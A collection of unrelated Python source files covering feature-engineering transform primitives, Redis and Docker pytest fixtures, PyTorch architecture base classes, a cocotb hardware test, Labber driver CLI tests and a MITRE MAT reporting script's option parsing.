input_types = [Datetime]
return_type = Categorical
description_template = "the season of {}"
def __init__(self, hemisphere="northern"):
self.hemisphere = hemisphere.lower()
def get_function(self):
def season(values):
result = []
if self.hemisphere == "northern" or self.hemisphere == "north":
for value in values:
month = value.month
if 3 <= month <= 5:
result.append("spring")
elif 6 <= month <= 8:
result.append("summer")
elif 9 <= month <= 11:
result.append("fall")
else:
result.append("winter")
elif self.hemisphere == "southern" or self.hemisphere == "south":
for value in values:
month = value.month
if 3 <= month <= 5:
result.append("fall")
elif 6 <= month <= 8:
result.append("winter")
elif 9 <= month <= 11:
result.append("spring")
else:
result.append("summer")
return np.array(result)
return season
class Sign(TransformPrimitive):
"""Determines the sign of numeric values.
Description:
Given a list of numbers, returns 0, 1, -1 if the number is zero, positive, or negative, respectively.
If input value is NaN, returns NaN.
Examples:
>>> sign = Sign()
>>> sign([1., -2., 3., -4., 0]).tolist()
[1.0, -1.0, 1.0, -1.0, 0.0]
"""
name = "sign"
input_types = [Numeric]
return_type = Numeric
description_template = "the sign of {}"
def get_function(self):
def sign(values):
return np.sign(values)
return sign
class StopwordCount(TransformPrimitive):
"""Determines number of stopwords in a string.
Description:
Given list of strings, determine the number of stopwords characters in each string.
Looks for any of the English stopwords defined in `nltk.corpus.stopwords`.
Case insensitive.
Examples:
>>> x = ['This is a test string.', 'This is second string', 'third string']
>>> stopword_count = StopwordCount()
>>> stopword_count(x).tolist()
[3.0, 2.0, 0.0]
"""
name = "stopword_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of stopwords in {}"
def get_function(self):
def stop_cnt(values):
result = []
stop_words = stopwords.words('english')
for words in values.str.split():
cnt = 0
for word in words:
if word.lower() in stop_words:
cnt += 1
result.append(cnt)
return np.array(result)
return stop_cnt
class SubRegionCodeToRegion(TransformPrimitive):
"""Determines the region of a US sub-region.
Description:
Converts a ISO 3166-2 region code to a higher-level US region.
Possible values include the following: `['West', 'South', 'Northeast', 'Midwest']`
Examples:
>>> sub_region_code_to_region = SubRegionCodeToRegion()
>>> subregions = ["US-AL", "US-IA", "US-VT", "US-DC", "US-MI", "US-NY"]
>>> sub_region_code_to_region(subregions).tolist()
['south', 'midwest', 'northeast', 'south', 'midwest', 'northeast']
"""
name = "sub_region_code_to_region"
input_types = [SubRegionCode]
return_type = Categorical
description_template = "the region of {}"
def get_function(self):
def sub_to_region(values):
url = "https://raw.githubusercontent.com/cphalpert/census-regions/master/us%20census%20bureau%20regions%20and%20divisions.csv"
data = pandas.read_csv(url)
result = []
for value in values:
selected_data = data[data['State Code'] == value[-2:]]
result.append(selected_data['Region'].to_list()[0].lower())
return np.array(result)
return sub_to_region
class TitleWordCount(TransformPrimitive):
"""Determines the number of title words in a string.
Description:
Given list of strings, determine the number of title words in each string.
A title word is defined as any word starting with a capital letter.
Words at the start of a sentence will be counted.
Examples:
>>> x = ['My favorite movie is Jaws.', 'this is a string', 'AAA']
>>> title_word_count = TitleWordCount()
>>> title_word_count(x).tolist()
[2.0, 0.0, 1.0]
"""
name = "title_word_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of title words in {}"
def get_function(self):
def title_word_cnt(values):
result = []
for words in values.str.split():
cnt = 0
for word in words:
if word[0].isupper():
cnt += 1
result.append(cnt)
return np.array(result)
return title_word_cnt
class UpperCaseCount(TransformPrimitive):
"""Calculates the number of upper case letters in text.
Description:
Given a list of strings, determine the number of characters in each string that are capitalized.
Counts every letter individually, not just every word that contains capitalized letters.
Examples:
>>> x = ['This IS a string.', 'This is a string', 'aaa']
>>> upper_case_count = UpperCaseCount()
>>> upper_case_count(x).tolist()
[3.0, 1.0, 0.0]
"""
name = "upper_case_count"
input_types = [NaturalLanguage]
return_types = Numeric
description_template = "the number of upper case letters in {}"
def get_function(self):
def upper_cnt(values):
return values.str.count(pat='[A-Z]')
return upper_cnt
class UpperCaseWordCount(TransformPrimitive):
"""Determines the number of words in a string that are entirely capitalized.
Description:
Given list of strings, determine the number of words in each string that are entirely capitalized.
Examples:
>>> x = ['This IS a string.', 'This is a string', 'AAA']
>>> upper_case_word_count = UpperCaseWordCount()
>>> upper_case_word_count(x).tolist()
[1.0, 0.0, 1.0]
"""
name = "upper_case_word_count"
input_types = [NaturalLanguage]
return_type = Numeric
description_template = "the number of words that are entirely capitalized in {}"
def get_function(self):
def upper_word_cnt(values):
result = []
for words in values.str.split():
cnt = 0
for word in words:
if word.isupper():
cnt += 1
result.append(cnt)
return np.array(result)
return upper_word_cnt
class URLToProtocol(TransformPrimitive):
"""Determines the protocol(http or https) of a url.
Description:
Extract the protocol of a url using regex.
It will be either https or http.
Returns nan if the url doesn't contain a protocol.
Examples:
>>> url_to_protocol = URLToProtocol()
>>> urls = ['https://www.google.com', 'http://www.google.co.in',
... 'www.facebook.com']
>>> url_to_protocol(urls).to_list()
['https', 'http', nan]
"""
name = "url_to_protocol"
input_types = [URL]
return_type = Categorical
description_template = "the protocol of {}"
def get_function(self):
def url_to_protocol(values):
result = []
for value in values:
pat = re.findall('https|http', value)
if pat:
result.append(pat[0])
else:
result.append(np.nan)
return Series(result)
return url_to_protocol
class ZIPCodeToState(TransformPrimitive):
"""Extracts the state from a ZIPCode.
Description:
Given a ZIPCode, return the state it's in.
ZIPCodes can be 5-digit or 9-digit.
In the case of 9-digit ZIPCodes, only the first 5 digits are used and any digits after the first five are discarded.
Return nan if the ZIPCode is not found.
Examples:
>>> zipcode_to_state = ZIPCodeToState()
>>> states = zipcode_to_state(['60622', '94120', '02111-1253'])
>>> list(map(str, states))
['IL', 'CA', 'MA']
"""
name = "zip_code_to_state"
input_types = [ZIPCode]
return_type = Categorical
description_template = "the state from a ZIPCode {}"
def get_function(self):
def zip_to_state(values):
result = []
zipDb = ZipCodeDatabase()
for value in values:
result.append(zipDb[value[:5]].state)
return np.array(result)
return zip_to_state
class CountString(TransformPrimitive):
"""Determines how many times a given string shows up in a text field.
Examples:
>>> count_string = CountString(string="the")
>>> count_string(["The problem was difficult.",
... "He was there.",
... "The girl went to the store."]).tolist()
[1, 1, 2]
"""
name = "count_string"
input_types = [NaturalLanguage]
return_type = Numeric
def __init__(self, string = "", ignore_case = True, ignore_non_alphanumeric = False, is_regex = False, match_whole_words_only = False):
self.string = string
self.ignore_case = ignore_case
self.ignore_non_alphanumeric = ignore_non_alphanumeric
self.is_regex = is_regex
self.match_whole_words_only = match_whole_words_only
def get_function(self):
def count_string(array):
count = []
for value in array:
if self.ignore_case:
value = value.lower()
self.string = self.string.lower()
if self.ignore_non_alphanumeric:
filtered = filter(str.isalnum, value)
value = "".join(filtered)
if self.is_regex:
import re
temp = re.findall(self.string, value)
value = " ".join(temp)
if self.match_whole_words_only:
count.append(sum(self.string in value))
else: count.append(value.count(self.string))
return pandas.Index(count)
return count_string
class CumulativeTimeSinceLastFalse(TransformPrimitive):
"""Determines the time since last `False` value.
Description:
Given a list of booleans and a list of corresponding datetimes, determine the time at each point since the last `False` value.
Returns time difference in seconds.
`NaN` values are ignored.
Examples:
>>> cumulative_time_since_last_false = CumulativeTimeSinceLastFalse()
>>> booleans = [False, True, False, True]
>>> datetimes = [
... datetime(2011, 4, 9, 10, 30, 0),
... datetime(2011, 4, 9, 10, 30, 10),
... datetime(2011, 4, 9, 10, 30, 15),
... datetime(2011, 4, 9, 10, 30, 29)
... ]
>>> cumulative_time_since_last_false(datetimes, booleans).tolist()
[0.0, 10.0, 0.0, 14.0]
"""
name = "cumulative_time_since_last_false"
input_types = [DatetimeTimeIndex, Boolean]
return_type = Numeric
def get_function(self):
def cumulative_time_since_last_false(datetimes, booleans):
count = []
last_false = 0
for idx, val in enumerate(booleans):
if val == False:
last_false = idx
count.append(0.0)
else:
cum = datetimes[idx] - datetimes[last_false]
count.append(float(cum.total_seconds()))
return pandas.Index(count)
return cumulative_time_since_last_false
class CumulativeTimeSinceLastTrue(TransformPrimitive):
"""Determines the time (in seconds) since the last boolean was `True` given a datetime index column and boolean column
Examples:
>>> cumulative_time_since_last_true = CumulativeTimeSinceLastTrue()
>>> booleans = [False, True, False, True]
>>> datetimes = [
... datetime(2011, 4, 9, 10, 30, 0),
... datetime(2011, 4, 9, 10, 30, 10),
... datetime(2011, 4, 9, 10, 30, 15),
... datetime(2011, 4, 9, 10, 30, 30)
... ]
>>> cumulative_time_since_last_true(datetimes, booleans).tolist()
[nan, 0.0, 5.0, 0.0]
"""
name = "cumulative_time_since_last_true"
input_types = [DatetimeTimeIndex, Boolean]
return_type = Numeric
def get_function(self):
def cumulative_time_since_last_true(datetimes, booleans):
count = []
last_true = 0
for idx, val in enumerate(booleans):
if val == True:
last_true = idx
count.append(0.0)
else:
cum = datetimes[idx] - datetimes[last_true]
count.append(float(cum.total_seconds()))
return pandas.Index(count)
return cumulative_time_since_last_true
class DateToTimeZone(TransformPrimitive):
"""Determines the timezone of a datetime.
Description:
Given a list of datetimes, extract the timezone from each one.
Looks for the `tzinfo` attribute on `datetime.datetime` objects.
If the datetime has no timezone or the date is missing, return `NaN`.
Examples:
>>> date_to_time_zone = DateToTimeZone()
>>> dates = [datetime(2010, 1, 1, tzinfo=timezone("America/Los_Angeles")),
... datetime(2010, 1, 1, tzinfo=timezone("America/New_York")),
... datetime(2010, 1, 1, tzinfo=timezone("America/Chicago")),
... datetime(2010, 1, 1)]
>>> date_to_time_zone(dates).tolist()
['America/Los_Angeles', 'America/New_York', 'America/Chicago', nan]
"""
name = "date_to_time_zone"
input_types = [Datetime]
return_type = Categorical
def get_function(self):
def date_to_time_zone(dates):
time_zone = []
for value in dates:
if value.tzinfo:
time_zone.append(str(value.tzinfo))
else:
time_zone.append(None)
return pandas.Index(time_zone)
return date_to_time_zone
class DayName(TransformPrimitive):
"""Transforms a date into the weekday name for the date.
Examples:
>>> day_name = DayName()
>>> dates = pd.Series([datetime(2016, 1, 1),
... datetime(2016, 2, 27),
... datetime(2017, 5, 29, 10, 30, 5),
... datetime(2018, 7, 18)])
>>> day_name(dates).tolist()
['Friday', 'Saturday', 'Monday', 'Wednesday']
"""
name = "day_name"
input_types = [Datetime]
return_type = Categorical
def get_function(self):
def day_name(dates):
days = []
day_name = ['Monday', 'Tuesday', 'Wednesday', 'Thursday', 'Friday', 'Saturday', 'Sunday']
for value in dates:
day = value.weekday()
days.append(day_name[day])
return pandas.Index(days)
return day_name
class GreaterThanPrevious(TransformPrimitive):
"""Determines if a value is greater than the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is greater than the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Examples:
>>> greater_than_previous = GreaterThanPrevious()
>>> greater_than_previous([1, 2, 1, 4]).tolist()
[False, True, False, True]
"""
name = "greater_than_previous"
input_types = [Numeric]
return_type = Numeric
def __init__(self, fill_method = None, limit = None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def greater_than_previous(numbers):
results = []
prev = None
for num in numbers:
if prev is None:
results.append(False)
else:
results.append(num > prev)
prev = num
return pandas.Index(results)
return greater_than_previous
class IsFirstOccurrence(TransformPrimitive):
"""Determines whether a value is the first occurrence of the value in a list.
Examples:
>>> is_first_occurrence = IsFirstOccurrence()
>>> is_first_occurrence([1, 2, 2, 3, 1]).tolist()
[True, True, False, True, False]
"""
name = "is_first_occurrence"
input_types = [Discrete]
return_type = Boolean
def get_function(self):
def is_first_occurrence(values):
results = []
for idx in range(len(values)):
found = False
for idx_before in range(idx):
if values.iloc[idx] == values.iloc[idx_before]:
results.append(False)
found = True
break
if not found:
results.append(True)
return pandas.Index(results)
return is_first_occurrence
class IsLastOccurrence(TransformPrimitive):
"""Determines whether a value is the last occurrence of the value in a list.
Examples:
>>> is_last_occurrence = IsLastOccurrence()
>>> is_last_occurrence([1, 2, 2, 3, 1]).tolist()
[False, False, True, True, True]
"""
name = "is_last_occurrence"
input_types = [Discrete]
return_type = Boolean
def get_function(self):
def is_last_occurrence(values):
results = []
for idx in range(len(values)):
found = False
for idx_after in range(idx + 1, len(values)):
if values.iloc[idx] == values.iloc[idx_after]:
results.append(False)
found = True
break
if not found:
results.append(True)
return pandas.Index(results)
return is_last_occurrence
class IsMaxSoFar(TransformPrimitive):
"""Determines if a number in a list is larger than every value before it.
Examples:
>>> is_max_so_far = IsMaxSoFar()
>>> is_max_so_far([2, 3, 5, 1, 3, 10]).tolist()
[True, True, True, False, False, True]
"""
name = "is_max_so_far"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_max_so_far(numbers):
max_val = None
results = []
for val in numbers:
if max_val is None or val >= max_val:
results.append(True)
max_val = val
else:
results.append(False)
return pandas.Index(results)
return is_max_so_far
class IsMinSoFar(TransformPrimitive):
"""Determines if a number in a list is smaller than every value before it.
Examples:
>>> is_min_so_far = IsMinSoFar()
>>> is_min_so_far([2, 3, 5, 1, 3, 10]).tolist()
[True, False, False, True, False, False]
"""
name = "is_min_so_far"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_min_so_far(numbers):
min_val = None
results = []
for val in numbers:
if min_val is None or val <= min_val:
results.append(True)
min_val = val
else:
results.append(False)
return pandas.Index(results)
return is_min_so_far
class IsWholeNumber(TransformPrimitive):
"""Determines whether a float is a whole number.
Description:
Given a list of floats, determine whether each number is whole.
If number has any non-zero decmial value, return `False`.
If the number is missing, return `NaN`.
Examples:
>>> is_whole_number = IsWholeNumber()
>>> x = [1.0, 1.1, 1.00000001, 100.0, None]
>>> is_whole_number(x).tolist()
[True, False, False, True, nan]
"""
name = "is_whole_number"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_whole_number(numbers):
results = []
for val in numbers:
if math.isnan(val):
results.append(None)
elif val == int(val):
results.append(True)
else:
results.append(False)
return pandas.Index(results)
return is_whole_number
class IsZero(TransformPrimitive):
"""Determines whether a number is equal to zero.
Examples:
>>> is_zero = IsZero()
>>> is_zero([1, 0, 0.00, 4]).tolist()
[False, True, True, False]
"""
name = "is_zero"
input_types = [Numeric]
return_type = Boolean
def get_function(self):
def is_zero(numbers):
results = []
for val in numbers:
if val == 0:
results.append(True)
else:
results.append(False)
return pandas.Index(results)
return is_zero
class Lag(TransformPrimitive):
"""Shifts an array of values by a specified number of periods.
Examples:
>>> lag = Lag()
>>> lag([1, 2, 3, 4, 5]).tolist()
[nan, 1.0, 2.0, 3.0, 4.0]
"""
name = "lag"
input_types = [Variable]
return_type = None
def __init__(self, periods = 1, fill_value = None):
self.periods = periods
self.fill_value = fill_value
def get_function(self):
def lag(numbers):
results = deque(numbers)
results.rotate(self.periods)
for i in range(self.periods):
results[i] = None
return pandas.Index(results)
return lag
class LessThanPrevious(TransformPrimitive):
"""Determines if a value is less than the previous value in a list.
Description:
Compares a value in a list to the previous value and returns True if the value is less than the previous value or False otherwise.
The first item in the output will always be False, since there is no previous element for the first element comparison.
Any nan values in the input will be filled using either a forward-fill or backward-fill method, specified by the fill_method argument.
The number of consecutive nan values that get filled can be limited with the limit argument.
Any nan values left after filling will result in False being returned for any comparison involving the nan value.
Examples:
>>> less_than_previous = LessThanPrevious()
>>> less_than_previous([1, 2, 1, 4]).tolist()
[False, False, True, False]
"""
name = "less_than_previous"
input_types = [Numeric]
return_type = Numeric
def __init__(self, fill_method = None, limit = None):
self.fill_method = fill_method
self.limit = limit
def get_function(self):
def less_than_previous(numbers):
results = []
prev = None
for num in numbers:
if prev is None:
results.append(False)
else:
results.append(num < prev)
prev = num
return pandas.Index(results)
return less_than_previous
class MeanCharactersPerWord(TransformPrimitive):
"""Determines the mean number of characters per word.
Description:
Given list of strings, determine the mean number of characters per word in each string.
A word is defined as a series of any characters not separated by white space.
Punctuation is removed before counting.
If a string is empty or `NaN`, return `NaN`.
Examples:
>>> x = ['This is a test file', 'This is second line', 'third line $1,000']
>>> mean_characters_per_word = MeanCharactersPerWord()
>>> mean_characters_per_word(x).tolist()
[3.0, 4.0, 5.0]
"""
name = "mean_characters_per_word"
input_types = [NaturalLanguage]
return_type = Numeric
def get_function(self):
def mean_characters_per_word(sentences):
count = []
for sen in sentences:
words = str(sen).split(" ")
length = 0
for word in words:
length += len(word)
count.append(length/len(words))
return pandas.Index(count)
return mean_characters_per_word
|
import time
import pvl
import pytest
import docker
import numpy as np
from aiohttp.test_utils import loop_context
from web import redis_cache, pdsimage
TEST_REDIS_PORT = 6380
@pytest.fixture(scope='function', autouse=True)
def turn_off_sentry(mocker):
mocker.patch('web.constants.DSN', '')
mocker.patch('web.app.DSN', '')
@pytest.fixture(scope='session')
def loop():
with loop_context() as _loop:
yield _loop
@pytest.fixture(scope='session')
def event_loop(loop):
yield loop
@pytest.fixture(autouse=True)
async def redis_server_config(mocker):
mocker.patch('web.redis_cache.REDIS_PORT', TEST_REDIS_PORT)
@pytest.fixture(scope='session')
async def docker_container():
client = docker.from_env()
try:
client.images.get('redis:latest')
except docker.errors.ImageNotFound:
client.images.pull(
repository='redis',
tag='latest',
)
container = client.containers.run(
image='redis',
ports={'6379/tcp': f'{TEST_REDIS_PORT}'},
detach=True,
publish_all_ports=True,
)
try:
# wait for redis to be ready:
n = 0
for n, text in enumerate(container.logs(stream=True)):
if b'Server initialized' in text:
time.sleep(2)
break
elif n < 100:
continue
# Posgres database ready to go
yield container
except Exception:
raise
finally:
container.kill()
container.remove()
@pytest.fixture(scope='function')
async def rcache(docker_container):
cache = await redis_cache.get_rcache()
await cache.flushall()
yield cache
await cache.flushall()
@pytest.fixture(scope='function')
async def label():
label = pvl.PVLModule({
'RECORD_BYTES': 3,
'^IMAGE': 66,
'PRODUCT_ID': 'testimg',
'IMAGE': {
'LINE_SAMPLES': 4,
'LINES': 2,
'BANDS': 3,
'SAMPLE_TYPE': 'MSB_INTEGER',
'SAMPLE_BITS': 16,
},
})
return label
DTYPE = np.dtype('>i2')
@pytest.fixture(scope='function')
async def image(label):
data = np.arange(1, 25).reshape((3, 2, 4))
data = data.astype(DTYPE)
im = pdsimage.PDSImage(data, label.copy())
return im
@pytest.fixture(scope='function')
async def gray_image(label):
data = np.arange(1, 9).reshape((1, 2, 4))
data = data.astype(DTYPE)
im = pdsimage.PDSImage(data, label.copy())
return im
|
from typing import Optional, Callable, Mapping, Any, List
import abc
import torch as tc
from drl.agents.architectures.abstract import Architecture
class StatelessArchitecture(Architecture, metaclass=abc.ABCMeta):
"""
Abstract class for stateless (i.e., memoryless) architectures.
"""
def __init__(
self,
w_init: Optional[Callable[[tc.Tensor], None]],
b_init: Optional[Callable[[tc.Tensor], None]],
**kwargs: Mapping[str, Any]):
"""
Args:
w_init (Optional[Callable[[torch.Tensor], None]]): Weight initializer.
b_init (Optional[Callable[[torch.Tensor], None]]): Bias initializer.
**kwargs (Mapping[str, Any]): Keyword arguments.
"""
super().__init__()
self._w_init = w_init
self._b_init = b_init
def _init_weights(self, sequential_module: tc.nn.Sequential) -> None:
for m in sequential_module:
if hasattr(m, 'weight'):
if self._w_init:
self._w_init(m.weight)
if hasattr(m, 'bias'):
if self._b_init:
self._b_init(m.bias)
@property
@abc.abstractmethod
def input_shape(self) -> List[int]:
"""
Returns:
Input shape without batch dimension.
"""
@property
@abc.abstractmethod
def output_dim(self) -> int:
"""
Returns:
Dimensionality of output features.
"""
@abc.abstractmethod
def forward(self, x, **kwargs):
"""
Forward method.
"""
class HeadEligibleArchitecture(StatelessArchitecture, metaclass=abc.ABCMeta):
"""
Abstract class for StatelessArchitecture classes
that can be used as prediction heads.
"""
def __init__(
self,
input_dim: int,
output_dim: int,
w_init: Callable[[tc.Tensor], None],
b_init: Callable[[tc.Tensor], None],
**kwargs: Mapping[str, Any]):
"""
Args:
input_dim: Input dimensionality.
Note that for HeadEligibleArchitectures, the input is assumed
to be one-dimensional.
output_dim: Output dimensionality.
w_init: Weight initializer.
b_init: Bias initializer.
**kwargs: Keyword arguments.
"""
super().__init__(w_init, b_init)
self._input_dim = input_dim
self._output_dim = output_dim
@property
def input_shape(self) -> List[int]:
shape = [self._input_dim]
return shape
@property
def output_dim(self) -> int:
return self._output_dim
|
import cocotb
from cocotb.clock import Clock
import cocotb.triggers as triggers
from cocotb.triggers import Timer
import hashes
import bit_handle as bh
report = open('report.txt','w')
@cocotb.test()
async def test(dut):
"""Try accessing the design."""
dut._log.info("Running test...")
cocotb.fork(Clock(dut.en, 2, units="ns").start())
fail = 0
dut.rst <= 1
await triggers.RisingEdge(dut.en)
await Timer(1, units="ns")
dut.rst <= 0
m = 0
v = []
for i in range(16384):
v.clear()
for j in range(7):
a = rc_model(m)
m += 1
v.insert(0,a)
expect = int.from_bytes(bh.arr_to_str(v),"big")
try:
if dut.out.value != expect:
fail = 1
report.write("When in = %X, out = %X, but I expect it = %X\n" %(i, int(dut.out.value), expect) )
except:
report.write("When in = %X, I expect it = %X, but out is unidentified\n" %(i, expect) )
await triggers.RisingEdge(dut.en)
await Timer(1, units="ns")
if fail == 0: report.write("------VERIFICATION SUCCEED------\n")
else: report.write("------VERIFICATION FAIL------\n")
dut._log.info("Running test...done")
report.close()
def rc_model(a):
n = hashes.rc(a)
return n
|
import tempfile
from unittest import mock
from unittest.mock import call
import pytest
from click.testing import CliRunner
from zhinst.labber.cli_script import main
from zhinst.labber import generate_labber_files
def test_cli_script_main():
runner = CliRunner()
result = runner.invoke(main, ["--help"])
assert result.exit_code == 0
def test_cli_script_setup_help():
runner = CliRunner()
result = runner.invoke(main, ["setup", "--help"])
assert result.exit_code == 0
@mock.patch(
"zhinst.labber.cli_script.generate_labber_files",
return_value=[["bar"], ["foo"]],
wraps=generate_labber_files,
)
@pytest.mark.parametrize(
"inp, outp",
[
(
["dev1234", "localhost"],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "NORMAL",
"upgrade": False,
"server_port": None,
"hf2": False,
},
),
(
[
"dev1234",
"localhost",
"--server_port=812",
"--hf2",
"--upgrade",
"--mode=ADVANCED",
],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "ADVANCED",
"upgrade": True,
"server_port": 812,
"hf2": True,
},
),
(
["dev1234", "localhost", "--server_port=812"],
{
"device_id": "dev1234",
"server_host": "localhost",
"mode": "NORMAL",
"upgrade": False,
"server_port": 812,
"hf2": False,
},
),
],
)
def test_cli_script_setup(mock_gen, inp, outp):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
result = runner.invoke(main, ["setup", tmpdirname] + inp)
calls = {"driver_directory": tmpdirname}
calls.update(outp)
mock_gen.assert_called_with(**calls)
assert result.exit_code == 0
assert (
result.output == "Generating Zurich Instruments Labber device drivers...\n"
"Generated file: bar\n"
"Upgraded file: foo\n"
)
@mock.patch("zhinst.labber.cli_script.generate_labber_files", return_value=[[], []])
def test_cli_script_no_files(mock_gen):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
result = runner.invoke(
main, ["setup", tmpdirname, "dev1234", "localhost", "--server_port=812"]
)
assert result.exit_code == 0
assert "Error: It appears that the driver already exists" in result.output
@mock.patch("zhinst.labber.cli_script.generate_labber_files")
def test_cli_script_setup_errors(mock_gen):
runner = CliRunner()
with tempfile.TemporaryDirectory() as tmpdirname:
command = ["setup"]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Missing argument 'DRIVER_DIRECTORY'." in result.output
command = ["setup", tmpdirname]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Missing argument 'DEVICE_ID'." in result.output
command = ["setup", tmpdirname, "dev123"]
result = runner.invoke(main, command)
mock_gen.assert_not_called()
assert result.exit_code == 2
assert "Error: Missing argument 'SERVER_HOST'." in result.output
|
#!MF_PYTHONBIN
# Copyright (C) 2010 The MITRE Corporation. See the toplevel
# file LICENSE for license terms.
import os, sys
MAT_PKG_PYLIB = "MF_MAT_PKG_PYLIB"
sys.path.insert(0, MAT_PKG_PYLIB)
# Must import MAT so that sys.path is enhanced.
import MAT
PLUGIN_DIR = MAT.PluginMgr.LoadPlugins()
#
# Toplevel
#
from MAT.Operation import CmdlineOpArgumentAggregator, OptionParser, OptionGroup
from MAT.Score import WriteableTable
parser = OptionParser(usage = "Usage: %prog [options]")
AGGREGATOR = CmdlineOpArgumentAggregator(parser)
CONCORDANCE_WINDOW = 32
def UsageError(msg):
global parser
print >> sys.stderr, msg
parser.print_help()
sys.exit(1)
def _fileTypeCallback(optionObj, flag, value, parser):
global AGGREGATOR
setattr(parser.values, optionObj.dest, value)
try:
cls = MAT.DocumentIO.getInputDocumentIOClass(value)
cls.addInputOptions(AGGREGATOR)
except KeyError:
UsageError("Error: file_type must be one of " + ", ".join(["'"+x+"'" for x in MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])]))
group = OptionGroup(parser, "Core options")
group.add_option("--task",
metavar = "task",
dest = "task",
type = "string",
help = "name of the task to use. Obligatory if neither --content_annotations nor --content_annotations_all are provided, and more than one task is registered. Known tasks are: " + ", ".join(PLUGIN_DIR.keys()))
group.add_option("--content_annotations", dest = "content_annotations",
metavar = "label,label,...",
help = "Optional. If --task is not provided, the reporter requires additional, external information to determine which annotations are content annotations. Use this flag to provide a comma-separated sequence of annotation labels which should be treated as content annotations.")
group.add_option("--content_annotations_all",
action = "store_true",
help = "Optional. If neither --task nor --content_annotations are provided, this flag will cause all labels in the document to be treated as content annotations.")
group.add_option("--verbose", action = "store_true",
help = "If present, the tool will provide detailed information on its progress.")
parser.add_option_group(group)
group = OptionGroup(parser, "Input options")
group.add_option("--input_dir", dest = "input_dir", action = "append",
metavar = "dir",
help = "A directory, all of whose files will be reported on. Can be repeated. May be specified with --input_files.")
group.add_option("--input_files", dest = "input_files", action = "append",
metavar = "re",
help = "A glob-style pattern describing full pathnames to be reported on. May be specified with --input_dir. Can be repeated.")
group.add_option("--file_type", dest = "file_type",
type = "string",
action = "callback",
callback = _fileTypeCallback,
metavar = " | ".join(MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])),
help = "The file type of the input. One of " + ", ".join(MAT.DocumentIO.allInputDocumentIO(exclusions = ['raw'])) + ". Default is mat-json.")
group.add_option("--encoding", dest = "encoding",
type = "string",
metavar = "encoding",
help = 'The encoding of the input. The default is the appropriate default for the file type.')
parser.add_option_group(group)
group = OptionGroup(parser, "Output options")
group.add_option("--output_dir", dest = "output_dir", metavar="dir",
help = "The output directory for the reports. Will be created if it doesn't exist. Required.")
group.add_option("--csv", dest = "csv", action = "store_true",
help = "Generate a CSV file in the output directory, with concordance-style data: file, location, content, left and right context, annotation label. At least one of this option and --txt must be provided.")
group.add_option("--txt", dest = "txt", action = "store_true",
help = "Generate a text file in the output directory, with concordance-style data, sorted first by annotation label and then by content. At least one of this option and --csv must be provided.")
group.add_option("--concordance_window", dest = "concordance_window", type = "int",
metavar = "chars",
help = "Use the specified value as the window size on each side of the concordance. Default is %d." % CONCORDANCE_WINDOW)
group.add_option("--omit_concordance_context", dest = "omit_concordance_context", action = "store_true",
help = "Omit the left and right concordance context from the output.")
group.add_option("--file_csv", dest = "file_csv", action = "store_true",
help = "Generate a separate CSV file consisting of file-level statistics such as file size in characters and number of annotations of each type.")
group.add_option("--interpolate_file_info", dest = "interpolate_file_info", action = "store_true",
help = "Instead of a separate CSV file for the file-level statistics, interpolate them into the concordance.")
group.add_option("--include_spanless", action = "store_true",
help = "By default, only spanned content annotations are produced. If this flag is present, spanless annotations (without position or left or right context, of course) will be included. If the spanless annotations refer to spanned annotations, the text context of the referred annotations will be inserted in the 'text' column.")
group.add_option("--partition_by_label", dest = "partition_by_label", action = "store_true",
help = "If present, in addition to the standard output file report.csv and/or report.txt, the tool will generate a separate spreadsheet for each label, with a column for each attribute.")
parser.add_option_group(group)
# Make sure that the JSON arguments are always available.
_jsonIO = MAT.DocumentIO.getDocumentIOClass('mat-json')
_jsonIO.addInputOptions(AGGREGATOR)
options, args = parser.parse_args()
# Figure out the task. I need the task and config arguments, both, before
# I try to digest the rest of the command line.
allTasks = PLUGIN_DIR.getAllTasks()
TASK = None
CACHED_LABELS = None
if options.task is not None:
TASK = PLUGIN_DIR.getTask(options.task)
if TASK is None:
UsageError("Unknown task '%s'." % options.task)
CACHED_LABELS = TASK.getAnnotationTypesByCategory("content")
elif options.content_annotations:
CACHED_LABELS = [s.strip() for s in options.content_annotations.split(",")]
elif options.content_annotations_all:
pass
elif len(allTasks) == 1:
TASK = allTasks[0]
CACHED_LABELS = TASK.getAnnotationTypesByCategory("content")
else:
UsageError("Neither --task nor --content_annotations nor --content_annotations_all is specified, and more than one task is known.")
if args:
UsageError("Extra arguments found: %s" % " ".join(args))
if not (options.csv or options.txt):
UsageError("Either --csv or --txt must be provided.")
if not options.output_dir:
UsageError("--output_dir must be provided.")
elif os.path.exists(options.output_dir) and (not os.path.isdir(options.output_dir)):
UsageError("value of --output_dir exists, but is not a directory.")
# Finally, figure out the file list.
FILES = set()
import glob
if options.input_dir is not None:
for dir in options.input_dir:
if not os.path.isdir(dir):
print >> sys.stderr, "Warning: skipping nonexistent directory '%s'." % dir
continue
for elt in os.listdir(dir):
p = os.path.join(dir, elt)
if os.path.isfile(p):
FILES.add(p)
if options.input_files is not None:
for pat in options.input_files:
for elt in glob.glob(pat):
if os.path.isfile(elt):
FILES.add(elt)
if len(FILES) == 0:
UsageError("No files specified.")
if options.file_type is None:
options.file_type = 'mat-json'
kw = AGGREGATOR.convertToKW(options)
# "task" needs to be an actual object.
try:
del kw["task"]
except:
pass
IO_TYPE = MAT.DocumentIO.getDocumentIO(options.file_type, task = TASK, **kw)
DO_CONCORDANCE = not options.omit_concordance_context
if options.concordance_window is not None:
CONCORDANCE_WINDOW = options.concordance_window
